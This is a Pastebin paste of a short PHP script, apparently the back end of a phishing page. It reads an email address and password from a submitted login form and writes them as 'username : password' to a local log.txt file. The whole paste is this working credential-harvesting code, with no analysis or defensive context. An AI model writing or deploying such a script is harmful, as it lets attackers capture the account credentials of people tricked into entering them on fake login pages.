Advertisement
Guest User

Untitled

a guest
Jan 13th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. <?php
  2.  
  3. $username = htmlspecialchars($_POST['accountEmailAddress']);
  4. $password = htmlspecialchars($_POST['accountPassword']);
  5.  
  6. $ufile = fopen('log.txt', 'w');
  7.  
  8. fwrite($ufile, "$username : $password");
  9.  
  10. fclose($ufile);
  11.  
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement